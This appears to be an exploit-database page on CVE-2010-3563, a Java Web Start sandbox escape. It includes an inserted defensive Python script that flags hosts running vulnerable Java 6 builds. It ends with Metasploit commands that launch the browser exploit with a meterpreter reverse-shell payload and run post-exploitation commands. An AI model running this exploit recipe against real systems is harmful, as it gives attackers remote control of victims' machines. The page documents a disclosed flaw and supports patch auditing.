CVE-2010-3563 : Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit

Timeline :

Vulnerability reported by Matthias Kaiser through ZDI to Oracle on 2010-04-05
Coordinated public release of the advisory on 2010-10-12
Metasploit PoC provided by egypt on 2010-11-19

    PoC provided by :

Matthias Kaiser
egypt

    Reference(s) :

CVE-2010-3563

    Affected version(s) :

Java 6 Standard Edition prior to update 22

    Tested on Windows XP SP3 with :

Java 6 Standard Edition Update 10

    Description :

This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to escape the Java sandbox. By injecting a parameter into the javaws call made within the BasicServiceImpl class, the default Java sandbox policy file can be overwritten. The vulnerability affects version 6 prior to update 22. NOTE: Exploiting this vulnerability causes several sinister-looking popup windows saying that Java is “Downloading application.”
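The advisory scopes the bug to Java 6 prior to update 22, so the practical defensive question is which hosts still run an affected build. The following is an added example, not code from this page or from the Metasploit project: it parses Java version strings (the `1.6.0_<update>` form Java SE 6 reports, with an optional `-bNN` build suffix), extracts the version from captured `java -version` output, and lists the hosts whose runtime is older than 6u22. The host names and their `java -version` output are constructed sample data, not real systems.

```python
import re
from typing import Dict, List, Optional, Tuple

# Java SE 6 reports itself as 1.6.0_<update>; update 22 is the first fixed
# release according to the advisory above.
FIXED_UPDATE = 22

# Accepts "1.6.0_10", "1.6.0_22-b04" and "1.6.0" (no update number);
# the optional trailing "-b33" style build tag is ignored.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:_(\d+))?(?:-[\w.]+)?$")

# Pulls the quoted version out of the first line of `java -version` output,
# e.g.  java version "1.6.0_10"
_OUTPUT_RE = re.compile(r'java version "([^"]+)"')


def parse_java_version(version: str) -> Tuple[int, int, int, int]:
    """Return (major, minor, micro, update); update is 0 when absent."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Java version string: {version!r}")
    major, minor, micro, update = m.groups()
    return int(major), int(minor), int(micro), int(update or 0)


def is_affected(version: str) -> bool:
    """True when the version is Java SE 6 earlier than update 22."""
    major, minor, _micro, update = parse_java_version(version)
    if (major, minor) != (1, 6):
        # Other release lines are outside the advisory's stated scope; this
        # check only answers the "Java 6 prior to update 22" question.
        return False
    return update < FIXED_UPDATE


def version_from_output(output: str) -> Optional[str]:
    """Extract the version string from `java -version` output, or None."""
    m = _OUTPUT_RE.search(output)
    return m.group(1) if m else None


def audit(inventory: Dict[str, str]) -> List[str]:
    """Map host -> captured `java -version` output to the sorted list of
    hosts whose runtime is still affected."""
    affected = []
    for host, output in inventory.items():
        version = version_from_output(output)
        if version is not None and is_affected(version):
            affected.append(host)
    return sorted(affected)


# Constructed sample inventory: three hypothetical hosts and their output.
SAMPLE_INVENTORY = {
    "ws-01": 'java version "1.6.0_10"\nJava(TM) SE Runtime Environment (build 1.6.0_10-b33)\n',
    "ws-02": 'java version "1.6.0_22"\nJava(TM) SE Runtime Environment (build 1.6.0_22-b04)\n',
    "ws-03": 'java version "1.6.0_21"\nJava(TM) SE Runtime Environment (build 1.6.0_21-b06)\n',
}

if __name__ == "__main__":
    for host in audit(SAMPLE_INVENTORY):
        print(f"{host}: affected by CVE-2010-3563, update Java to 6u22 or later")
```

Feed `audit` whatever your inventory tool collects for `java -version`; the version check is kept separate from the output parsing so it can also be run over a bare version string from a software inventory export.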

    Commands :

use exploit/windows/browser/java_basicservice_impl
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig